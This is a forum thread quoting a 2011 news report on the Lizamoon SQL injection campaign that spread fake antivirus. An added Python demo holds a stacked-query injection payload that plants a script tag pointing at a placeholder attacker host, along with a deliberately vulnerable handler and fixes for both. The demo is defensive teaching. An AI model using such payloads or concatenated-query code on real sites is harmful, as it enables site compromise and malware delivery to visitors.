View Full Version : Fake Antivirus Website Hack

The Mad Monk
01-04-2011, 21:15:34
Thousands of Web Sites Hit With New Twist on Old SQL Injection Hack
by Arik Hesseldahl
Posted on April 1, 2011 at 1:10 PM PT

A relatively simple hack has been used to compromise at least 500,000 Web sites, and perhaps as many as 1.5 million, in such a way that visitors are tricked into downloading fake PC security software.

Dubbed Lizamoon, after the Web site where some users are in some cases redirected, the attack was first documented by the security research firm Websense. The hack seeks to trick Web users into believing that their computer has been compromised by viruses and prompts them to download fake security software that itself causes further problems. Among the sites serving up the links to the fake software sites are some belonging to Apple and used on its iTunes store, though Apple is said to have cleaned up the affected code on its site.

Websense says that so far it appears that sites using Microsoft SQL Server 2003 and 2005 are at risk, though as yet SQL Server 2008 doesn’t appear to be affected. No word yet from Microsoft about any of this, though I’ve asked them for a comment.

SQL injection attacks take place when malicious code–essentially commands to a Web server to do things it’s not supposed to do — are inserted into routine queries of a Web site’s database. A basic way to carry out these attacks is to add extra commands into the URL bar of the browser when visiting a vulnerable Web site. It’s not entirely clear exactly how this series of attacks has been carried out.

I talked with Josh Shaul, CTO of Application Security, Inc., a database security vendor that specializes in researching attacks on databases. “It’s a very new take on a very old type of attack,” Shaul said. “SQL injection has been the primary way that databases have been attacked for years. What’s different here is that people are putting the code that runs their Web sites in the database itself. And that’s what’s so troubling. Effectively you’ve exposed your code to an attacker so they can go modify it.”

Attackers found hundreds of thousands of sites that use a single user account to query their databases for all visitors, Shaul said. “The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to. Why is it that the log-in to use the database has the right to modify the code for the Web site itself? That makes no sense at all.”

In this case the attackers took advantage of the weakness to insert a script that creates a pop-up that sends a site’s visitors to another site that looks like a legitimate place to download new Microsoft security software. That makes the attack on the Web sites themselves just a means to an end–the end being tricking innocent Web users into clicking on a series of links and paying to download fake security software.

Websense produced a video demonstrating what happens. The short lesson is this: If you see a pop-up that tells you you’ve got a virus or that your computer is compromised by a bunch of security issues, don’t click any of the links in it; it’s probably not legit.


I've run into this on three webcomic sites. I nearly fell for it the first time, it's very good at instilling a feeling of panic. Once I realized that the OK button was going to install a .exe, I looked for a way to close the window, and concluded that the only safe way to do so was to kill the process from windows manager.
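
Added illustration (not from the article, Websense or AppSec Inc.): a toy model of the three things the quoted post says came together in Lizamoon: page markup stored in the database, a handler that pastes a URL parameter straight into its query, and a database login with the right to UPDATE that markup. sqlite3 stands in for SQL Server, executescript() stands in for a server that runs stacked ";"-separated statements, and an authorizer callback plays the part of the read-only account Shaul is asking for. The table layout, sample pages and the attacker.invalid host in the injected tag are all made up for the demo.

```python
"""Toy model of a Lizamoon-style mass SQL injection (constructed example).
sqlite3 stands in for SQL Server; nothing here is from the article or Websense."""
import sqlite3

# Constructed sample data: the site's page markup lives in the database.
SAMPLE_PAGES = [
    (1, "Home", "<h1>Welcome</h1><p>Latest comics</p>"),
    (2, "About", "<h1>About</h1><p>Who we are</p>"),
]

# Hypothetical injected tag; attacker.invalid is a placeholder, not the real host.
INJECTED_TAG = '<script src="http://attacker.invalid/ur.php"></script>'

# What a request like  page.php?id=<PAYLOAD>  would carry: the expected integer,
# then a stacked statement that appends the tag to every stored page body.
# (SQLite concatenates with ||; T-SQL would use +.)
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Fresh in-memory site database populated with SAMPLE_PAGES."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def as_readonly_account(conn):
    """Emulate a least-privilege web login: UPDATE/INSERT/DELETE are refused.
    sqlite3 has no GRANT, so an authorizer callback plays the DBMS permission check."""
    def deny_writes(action, *_):
        if action in (sqlite3.SQLITE_UPDATE, sqlite3.SQLITE_INSERT, sqlite3.SQLITE_DELETE):
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK
    conn.set_authorizer(deny_writes)


def vulnerable_handler(conn, raw_id):
    """The flawed pattern: the raw URL parameter is concatenated into the query and
    the whole string goes to the server, which runs every stacked statement in it."""
    conn.executescript("SELECT body FROM pages WHERE id = " + raw_id)


def safe_handler(conn, raw_id):
    """Hardened lookup: validate the parameter and bind it, so the payload is never
    parsed as SQL.  Returns the page body, or None for a malformed/unknown id."""
    try:
        page_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def render_page(conn, page_id):
    """The markup a visitor is served for a page."""
    return conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


def is_infected(conn):
    """Content check a site owner can run: does any stored page now carry a script tag?"""
    rows = conn.execute("SELECT body FROM pages").fetchall()
    return any("<script" in body.lower() for (body,) in rows)


def run_demo():
    """Run the three scenarios and report which defence held."""
    # 1. Vulnerable handler + over-privileged login: every page now serves the tag.
    conn = make_db()
    vulnerable_handler(conn, PAYLOAD)
    infected = is_infected(conn)
    served_home = render_page(conn, 1)

    # 2. Same flawed handler, read-only login: the DBMS refuses the stacked UPDATE,
    #    so the mass injection fails even though the code is still injectable.
    conn = make_db()
    as_readonly_account(conn)
    try:
        vulnerable_handler(conn, PAYLOAD)
        refused = False
    except sqlite3.DatabaseError:   # SQLITE_AUTH surfaces as DatabaseError
        refused = True
    least_privilege_held = refused and not is_infected(conn)

    # 3. Parameterized handler: the payload is rejected as a non-integer id.
    conn = make_db()
    parameterized_held = safe_handler(conn, PAYLOAD) is None and not is_infected(conn)

    return {
        "vulnerable_overprivileged_infected": infected,
        "served_home_page": served_home,
        "least_privilege_blocked": least_privilege_held,
        "parameterized_blocked": parameterized_held,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Scenario 2 is the one Shaul's quote is about: the handler is still broken, but a login that can only SELECT cannot rewrite the site's markup, so the worst an injection can do is read data. Scenario 3 is the real fix; you want both.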

02-04-2011, 02:24:48
Alt+F4 is your friend.